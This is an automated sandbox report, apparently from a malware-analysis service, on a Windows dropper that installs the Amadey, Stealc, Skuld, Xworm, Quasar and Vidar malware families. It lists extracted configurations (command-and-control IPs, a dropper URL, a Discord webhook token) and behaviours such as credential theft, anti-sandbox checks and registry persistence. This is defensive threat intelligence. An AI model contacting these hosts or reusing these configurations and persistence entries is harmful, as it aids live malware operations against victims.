amadey | a66ad1178645f946e6e9b98c181e660df8bf87c38c88b220a24f35f0406cc107

Analysis

max time kernel
142s
max time network
149s
platform
windows11-21h2_x64
resource
win11-20250313-en
resource tags

arch:x64arch:x86image:win11-20250313-enlocale:en-usos:windows11-21h2-x64system
submitted
22/03/2025, 12:37

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

random.exe
Size

5.5MB
MD5

8aa52be570da2efe4885957e29b89538
SHA1

2ad2e47c307b34d9a593e21dfe0dba723c110b3d
SHA256

a66ad1178645f946e6e9b98c181e660df8bf87c38c88b220a24f35f0406cc107
SHA512

c685dd857057879a6ff8bdb7279511e940babeb7f358a94e33fea308ac0bd8ceb6d2bcd758dd38eada0995bb96f910d5728c1431286f0875d2ca392b0ca7308e
SSDEEP

98304:ZDpKjlkbVghclaJ8RhIc1pX452gw8QzbRwm5H3gzIFNM2w+1R:yxQZFzQQ/5HvX9

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://196.251.91.42/up/uploads/encryption02.jpg

exe.dropper

http://196.251.91.42/up/uploads/encryption02.jpg

Extracted

Family

amadey

Version

5.21

Botnet

092155

http://176.113.115.6

Attributes

install_dir
bb556cff4a
install_file
rapes.exe
strings_key
a131b127e996a898cd19ffb2d92e481b
url_paths
/Ni9kiput/index.php

rc4.plain

Extracted

Family

stealc

Botnet

trump

http://45.93.20.28

Attributes

url_path
/85a1cacf11314eb8.php

Extracted

Family

skuld

https://discordapp.com/api/webhooks/1349647136895012916/qSys_fpsL_y7usKH_AyrFupSjzSsVfg2t895g2HV8Yz72asrwCIsHaqqhPtDFjz8g8_E

Extracted

Family

xworm

Version

5.0

httpss.myvnc.com:1907

Mutex

xWIArEKzuXpfRVkJ

Attributes

install_file
USB.exe

aes.plain

Extracted

Family

quasar

Version

1.3.0.0

Botnet

212.56.35.232:101

Mutex

QSR_MUTEX_L5s39LpA1y9H79tL6D

Attributes

encryption_key
oBOMHICrtHceojCPrnpp
install_name
svchost.exe
log_directory
Logs
reconnect_delay
3000
startup_key
svchosta
subdirectory
media

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey
Amadey family
amadey

Detect Vidar Stealer 6 IoCs

stealer

resource	yara_rule
behavioral4/memory/2068-774-0x0000000000400000-0x0000000000848000-memory.dmp	family_vidar_v7
behavioral4/memory/2068-773-0x0000000000400000-0x0000000000848000-memory.dmp	family_vidar_v7
behavioral4/memory/2068-885-0x0000000000400000-0x0000000000848000-memory.dmp	family_vidar_v7
behavioral4/memory/2068-1244-0x0000000000400000-0x0000000000848000-memory.dmp	family_vidar_v7
behavioral4/memory/2068-1271-0x0000000000400000-0x0000000000848000-memory.dmp	family_vidar_v7
behavioral4/memory/2068-1290-0x0000000000400000-0x0000000000848000-memory.dmp	family_vidar_v7

Detect Xworm Payload 2 IoCs

resource	yara_rule
behavioral4/memory/3456-806-0x0000000000400000-0x000000000040E000-memory.dmp	family_xworm
behavioral4/memory/3528-939-0x0000000009A50000-0x0000000009EE6000-memory.dmp	family_xworm

Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar
Quasar family
quasar

Quasar payload 1 IoCs

resource	yara_rule
behavioral4/memory/6004-1388-0x0000000000280000-0x00000000002DE000-memory.dmp	family_quasar

Skuld family
skuld
Skuld stealer
An info stealer written in Go lang.
stealer skuld
Stealc
Stealc is an infostealer written in C++.
stealer stealc
Stealc family
stealc

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

description	pid	Process	procid_target
PID 4732 created 3032	4732	Organizations.com	49

Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar
Vidar family
vidar
Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 8 IoCs

defense_evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	advnrNo.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	1P27l3.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	2S4013.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	3W01C.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	k3t05Da.exe

Blocklisted process makes network request 2 IoCs

flow	pid	Process
40	3528	powershell.exe
171	3528	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
1460	powershell.exe
14672	powershell.exe
5928	powershell.exe
2732	powershell.exe
3528	powershell.exe
1908	powershell.exe
2948	powershell.exe

Downloads MZ/PE file 9 IoCs

flow	pid	Process
43	1472	rapes.exe
43	1472	rapes.exe
43	1472	rapes.exe
187	2328	svchost.exe
188	1472	rapes.exe
8	1472	rapes.exe
186	1472	rapes.exe
9	1472	rapes.exe
11	1472	rapes.exe

Uses browser remote debugging 2 TTPs 13 IoCs

Can be used control the browser and steal sensitive information such as credentials and session cookies.

credential_access stealer

Steal Web Session Cookie

T1539

Modify Authentication Process

T1556

pid	Process
5948	msedge.exe
1072	chrome.exe
4412	chrome.exe
4644	chrome.exe
5964	msedge.exe
1000	msedge.exe
5144	chrome.exe
112	chrome.exe
4932	msedge.exe
5004	msedge.exe
5924	msedge.exe
3792	msedge.exe
3788	msedge.exe

Checks BIOS information in registry 2 TTPs 16 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	2S4013.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	advnrNo.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	1P27l3.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	3W01C.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	3W01C.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	k3t05Da.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	1P27l3.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	2S4013.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	k3t05Da.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	advnrNo.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe

Drops startup file 2 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\tetras.bat	cmd.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\tetras.bat	cmd.exe

Executes dropped EXE 26 IoCs

pid	Process
2084	G8U31.exe
236	1P27l3.exe
1472	rapes.exe
3576	2S4013.exe
892	3W01C.exe
5752	50KfF6O.exe
5148	zx4PJh6.exe
4732	Organizations.com
2940	rapes.exe
4004	k3t05Da.exe
2068	advnrNo.exe
6060	k3t05Da.exe
3456	k3t05Da.exe
2768	wjfOfXh.exe
2596	Kr9UTz2.exe
2528	OkH8IPF.exe
2724	rapes.exe
1580	weC48Q7.exe
1436	windowscore.exe
6004	word.exe
5192	ARxx7NW.exe
4488	0000032364.exe
4004	d3jhg_003.exe
4408	tK0oYx3.exe
5144	tzutil.exe
3544	w32tm.exe

Identifies Wine through registry keys 2 TTPs 7 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

defense_evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-1136229799-3442283115-138161576-1000\Software\Wine	advnrNo.exe
Key opened	\REGISTRY\USER\S-1-5-21-1136229799-3442283115-138161576-1000\Software\Wine	rapes.exe
Key opened	\REGISTRY\USER\S-1-5-21-1136229799-3442283115-138161576-1000\Software\Wine	1P27l3.exe
Key opened	\REGISTRY\USER\S-1-5-21-1136229799-3442283115-138161576-1000\Software\Wine	rapes.exe
Key opened	\REGISTRY\USER\S-1-5-21-1136229799-3442283115-138161576-1000\Software\Wine	2S4013.exe
Key opened	\REGISTRY\USER\S-1-5-21-1136229799-3442283115-138161576-1000\Software\Wine	3W01C.exe
Key opened	\REGISTRY\USER\S-1-5-21-1136229799-3442283115-138161576-1000\Software\Wine	rapes.exe

Loads dropped DLL 48 IoCs

pid	Process
4004	k3t05Da.exe
1436	windowscore.exe
1436	windowscore.exe
1436	windowscore.exe
1436	windowscore.exe
1436	windowscore.exe
1436	windowscore.exe
1436	windowscore.exe
1436	windowscore.exe
1436	windowscore.exe
1436	windowscore.exe
1436	windowscore.exe
1436	windowscore.exe
1436	windowscore.exe
1436	windowscore.exe
1436	windowscore.exe
1436	windowscore.exe
1436	windowscore.exe
1436	windowscore.exe
1436	windowscore.exe
1436	windowscore.exe
1436	windowscore.exe
1436	windowscore.exe
1436	windowscore.exe
1436	windowscore.exe
1436	windowscore.exe
1436	windowscore.exe
1436	windowscore.exe
1436	windowscore.exe
1436	windowscore.exe
1436	windowscore.exe
1436	windowscore.exe
1436	windowscore.exe
1436	windowscore.exe
1436	windowscore.exe
1436	windowscore.exe
1436	windowscore.exe
1436	windowscore.exe
1436	windowscore.exe
1436	windowscore.exe
1436	windowscore.exe
1436	windowscore.exe
1436	windowscore.exe
1436	windowscore.exe
1436	windowscore.exe
1436	windowscore.exe
1436	windowscore.exe
1436	windowscore.exe

Obfuscated with Agile.Net obfuscator 2 IoCs

Detects use of the Agile.Net commercial obfuscator, which is capable of entity renaming and control flow obfuscation.

agilenet

resource	yara_rule
behavioral4/files/0x001900000002b0cd-668.dat	agile_net
behavioral4/memory/4004-683-0x00000000002E0000-0x00000000008CC000-memory.dmp	agile_net

Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Themida packer 6 IoCs

Detects Themida, an advanced Windows software protection system.

themida

resource	yara_rule
behavioral4/memory/4004-693-0x000000006FE70000-0x0000000070450000-memory.dmp	themida
behavioral4/files/0x001900000002b0d0-691.dat	themida
behavioral4/memory/4004-695-0x000000006FE70000-0x0000000070450000-memory.dmp	themida
behavioral4/memory/4004-696-0x000000006FE70000-0x0000000070450000-memory.dmp	themida
behavioral4/memory/4004-738-0x000000006FE70000-0x0000000070450000-memory.dmp	themida
behavioral4/memory/4004-810-0x000000006FE70000-0x0000000070450000-memory.dmp	themida

Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 5 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	random.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\""	G8U31.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1136229799-3442283115-138161576-1000\Software\Microsoft\Windows\CurrentVersion\Run\Realtek HD Audio Universal Service = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Protect\\SecurityHealthSystray.exe"	50KfF6O.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1136229799-3442283115-138161576-1000\Software\Microsoft\Windows\CurrentVersion\Run\{57F06FF0-B2D5-45F3-BFEE-970F76E38EFD} = "C:\\ProgramData\\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}"	svchost.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{57F06FF0-B2D5-45F3-BFEE-970F76E38EFD} = "C:\\ProgramData\\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}"	svchost.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 1 IoCs

defense_evasion trojan

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	k3t05Da.exe

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
132	ip-api.com

Enumerates processes with tasklist 1 TTPs 2 IoCs

discovery

Process Discovery

T1057

pid	Process
3444	tasklist.exe
3764	tasklist.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 7 IoCs

pid	Process
236	1P27l3.exe
1472	rapes.exe
3576	2S4013.exe
892	3W01C.exe
2940	rapes.exe
2068	advnrNo.exe
2724	rapes.exe

Suspicious use of SetThreadContext 4 IoCs

description	pid	Process	procid_target
PID 4004 set thread context of 3456	4004	k3t05Da.exe	129
PID 2596 set thread context of 4284	2596	Kr9UTz2.exe	158
PID 2528 set thread context of 2816	2528	OkH8IPF.exe	162
PID 4408 set thread context of 1356	4408	tK0oYx3.exe	184

UPX packed file 3 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral4/files/0x001400000002af54-48.dat	upx
behavioral4/memory/5752-58-0x0000000000010000-0x0000000000A9E000-memory.dmp	upx
behavioral4/memory/5752-61-0x0000000000010000-0x0000000000A9E000-memory.dmp	upx

Drops file in Program Files directory 1 IoCs

description	ioc	Process
File created	C:\Program Files\RuntimeApp\0000032364.exe	ARxx7NW.exe

Drops file in Windows directory 11 IoCs

description	ioc	Process
File opened for modification	C:\Windows\VancouverPulse	zx4PJh6.exe
File opened for modification	C:\Windows\GuaranteesFear	zx4PJh6.exe
File opened for modification	C:\Windows\SheDrum	zx4PJh6.exe
File opened for modification	C:\Windows\InvestingTr	zx4PJh6.exe
File opened for modification	C:\Windows\OfficeForbes	zx4PJh6.exe
File opened for modification	C:\Windows\SystemTemp	chrome.exe
File created	C:\Windows\word.exe	powershell.exe
File created	C:\Windows\Tasks\rapes.job	1P27l3.exe
File opened for modification	C:\Windows\NecessityInfections	zx4PJh6.exe
File opened for modification	C:\Windows\CylinderPair	zx4PJh6.exe
File opened for modification	C:\Windows\SystemTemp	msedge.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 1 IoCs

pid	pid_target	Process	procid_target
748	4732	WerFault.exe	103

System Location Discovery: System Language Discovery 1 TTPs 36 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	d3jhg_003.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	G8U31.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	3W01C.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	extrac32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	k3t05Da.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	2S4013.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Organizations.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wjfOfXh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	zx4PJh6.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CMD.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	advnrNo.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	random.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	k3t05Da.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	word.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	1P27l3.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rapes.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	choice.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	advnrNo.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	advnrNo.exe

Delays execution with timeout.exe 1 IoCs

defense_evasion

pid	Process
5320	timeout.exe

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133871207651100776"	chrome.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
3544	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
236	1P27l3.exe
236	1P27l3.exe
1472	rapes.exe
1472	rapes.exe
3576	2S4013.exe
3576	2S4013.exe
3576	2S4013.exe
3576	2S4013.exe
3576	2S4013.exe
3576	2S4013.exe
892	3W01C.exe
892	3W01C.exe
4732	Organizations.com
4732	Organizations.com
4732	Organizations.com
4732	Organizations.com
4732	Organizations.com
4732	Organizations.com
2940	rapes.exe
2940	rapes.exe
4732	Organizations.com
4732	Organizations.com
4732	Organizations.com
4732	Organizations.com
848	svchost.exe
848	svchost.exe
848	svchost.exe
848	svchost.exe
2068	advnrNo.exe
2068	advnrNo.exe
2068	advnrNo.exe
2068	advnrNo.exe
2068	advnrNo.exe
2068	advnrNo.exe
1072	chrome.exe
1072	chrome.exe
4004	k3t05Da.exe
4004	k3t05Da.exe
5928	powershell.exe
5928	powershell.exe
5928	powershell.exe
3528	powershell.exe
3528	powershell.exe
3528	powershell.exe
2768	wjfOfXh.exe
2768	wjfOfXh.exe
2068	advnrNo.exe
2068	advnrNo.exe
2068	advnrNo.exe
2068	advnrNo.exe
2068	advnrNo.exe
2068	advnrNo.exe
2732	powershell.exe
2732	powershell.exe
2068	advnrNo.exe
2068	advnrNo.exe
2084	powershell.exe
2084	powershell.exe
2084	powershell.exe
4284	MSBuild.exe
4284	MSBuild.exe
4284	MSBuild.exe
4284	MSBuild.exe
2816	MSBuild.exe

Suspicious behavior: MapViewOfSection 3 IoCs

pid	Process
4004	d3jhg_003.exe
4004	d3jhg_003.exe
4004	d3jhg_003.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 10 IoCs

pid	Process
1072	chrome.exe
1072	chrome.exe
1072	chrome.exe
1072	chrome.exe
5004	msedge.exe
5004	msedge.exe
5004	msedge.exe
5004	msedge.exe
5004	msedge.exe
5004	msedge.exe

Suspicious use of AdjustPrivilegeToken 50 IoCs

description	pid	Process
Token: SeDebugPrivilege	5752	50KfF6O.exe
Token: SeDebugPrivilege	3764	tasklist.exe
Token: SeDebugPrivilege	3444	tasklist.exe
Token: SeShutdownPrivilege	1072	chrome.exe
Token: SeCreatePagefilePrivilege	1072	chrome.exe
Token: SeShutdownPrivilege	1072	chrome.exe
Token: SeCreatePagefilePrivilege	1072	chrome.exe
Token: SeDebugPrivilege	4004	k3t05Da.exe
Token: SeShutdownPrivilege	1072	chrome.exe
Token: SeCreatePagefilePrivilege	1072	chrome.exe
Token: SeDebugPrivilege	5928	powershell.exe
Token: SeDebugPrivilege	3528	powershell.exe
Token: SeShutdownPrivilege	1072	chrome.exe
Token: SeCreatePagefilePrivilege	1072	chrome.exe
Token: SeShutdownPrivilege	1072	chrome.exe
Token: SeCreatePagefilePrivilege	1072	chrome.exe
Token: SeDebugPrivilege	3456	k3t05Da.exe
Token: SeShutdownPrivilege	1072	chrome.exe
Token: SeCreatePagefilePrivilege	1072	chrome.exe
Token: SeShutdownPrivilege	1072	chrome.exe
Token: SeCreatePagefilePrivilege	1072	chrome.exe
Token: SeDebugPrivilege	2732	powershell.exe
Token: SeDebugPrivilege	2084	powershell.exe
Token: SeDebugPrivilege	1436	windowscore.exe
Token: SeIncreaseQuotaPrivilege	2084	powershell.exe
Token: SeSecurityPrivilege	2084	powershell.exe
Token: SeTakeOwnershipPrivilege	2084	powershell.exe
Token: SeLoadDriverPrivilege	2084	powershell.exe
Token: SeSystemProfilePrivilege	2084	powershell.exe
Token: SeSystemtimePrivilege	2084	powershell.exe
Token: SeProfSingleProcessPrivilege	2084	powershell.exe
Token: SeIncBasePriorityPrivilege	2084	powershell.exe
Token: SeCreatePagefilePrivilege	2084	powershell.exe
Token: SeBackupPrivilege	2084	powershell.exe
Token: SeRestorePrivilege	2084	powershell.exe
Token: SeShutdownPrivilege	2084	powershell.exe
Token: SeDebugPrivilege	2084	powershell.exe
Token: SeSystemEnvironmentPrivilege	2084	powershell.exe
Token: SeRemoteShutdownPrivilege	2084	powershell.exe
Token: SeUndockPrivilege	2084	powershell.exe
Token: SeManageVolumePrivilege	2084	powershell.exe
Token: 33	2084	powershell.exe
Token: 34	2084	powershell.exe
Token: 35	2084	powershell.exe
Token: 36	2084	powershell.exe
Token: SeDebugPrivilege	6004	word.exe
Token: SeDebugPrivilege	1908	powershell.exe
Token: SeDebugPrivilege	1460	powershell.exe
Token: SeDebugPrivilege	4488	0000032364.exe
Token: SeDebugPrivilege	2948	powershell.exe

Suspicious use of FindShellTrayWindow 32 IoCs

pid	Process
236	1P27l3.exe
4732	Organizations.com
4732	Organizations.com
4732	Organizations.com
1072	chrome.exe
1072	chrome.exe
1072	chrome.exe
1072	chrome.exe
1072	chrome.exe
1072	chrome.exe
1072	chrome.exe
1072	chrome.exe
1072	chrome.exe
1072	chrome.exe
1072	chrome.exe
1072	chrome.exe
1072	chrome.exe
1072	chrome.exe
1072	chrome.exe
1072	chrome.exe
1072	chrome.exe
1072	chrome.exe
1072	chrome.exe
1072	chrome.exe
1072	chrome.exe
1072	chrome.exe
1072	chrome.exe
1072	chrome.exe
1072	chrome.exe
1072	chrome.exe
5004	msedge.exe
5004	msedge.exe

Suspicious use of SendNotifyMessage 3 IoCs

pid	Process
4732	Organizations.com
4732	Organizations.com
4732	Organizations.com

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
6004	word.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2276 wrote to memory of 2084	2276	random.exe	81
PID 2276 wrote to memory of 2084	2276	random.exe	81
PID 2276 wrote to memory of 2084	2276	random.exe	81
PID 2084 wrote to memory of 236	2084	G8U31.exe	82
PID 2084 wrote to memory of 236	2084	G8U31.exe	82
PID 2084 wrote to memory of 236	2084	G8U31.exe	82
PID 236 wrote to memory of 1472	236	1P27l3.exe	84
PID 236 wrote to memory of 1472	236	1P27l3.exe	84
PID 236 wrote to memory of 1472	236	1P27l3.exe	84
PID 2084 wrote to memory of 3576	2084	G8U31.exe	85
PID 2084 wrote to memory of 3576	2084	G8U31.exe	85
PID 2084 wrote to memory of 3576	2084	G8U31.exe	85
PID 2276 wrote to memory of 892	2276	random.exe	87
PID 2276 wrote to memory of 892	2276	random.exe	87
PID 2276 wrote to memory of 892	2276	random.exe	87
PID 1472 wrote to memory of 5752	1472	rapes.exe	88
PID 1472 wrote to memory of 5752	1472	rapes.exe	88
PID 5752 wrote to memory of 6012	5752	50KfF6O.exe	90
PID 5752 wrote to memory of 6012	5752	50KfF6O.exe	90
PID 1472 wrote to memory of 5148	1472	rapes.exe	91
PID 1472 wrote to memory of 5148	1472	rapes.exe	91
PID 1472 wrote to memory of 5148	1472	rapes.exe	91
PID 5148 wrote to memory of 1076	5148	zx4PJh6.exe	92
PID 5148 wrote to memory of 1076	5148	zx4PJh6.exe	92
PID 5148 wrote to memory of 1076	5148	zx4PJh6.exe	92
PID 1076 wrote to memory of 3764	1076	CMD.exe	94
PID 1076 wrote to memory of 3764	1076	CMD.exe	94
PID 1076 wrote to memory of 3764	1076	CMD.exe	94
PID 1076 wrote to memory of 3560	1076	CMD.exe	95
PID 1076 wrote to memory of 3560	1076	CMD.exe	95
PID 1076 wrote to memory of 3560	1076	CMD.exe	95
PID 1076 wrote to memory of 3444	1076	CMD.exe	96
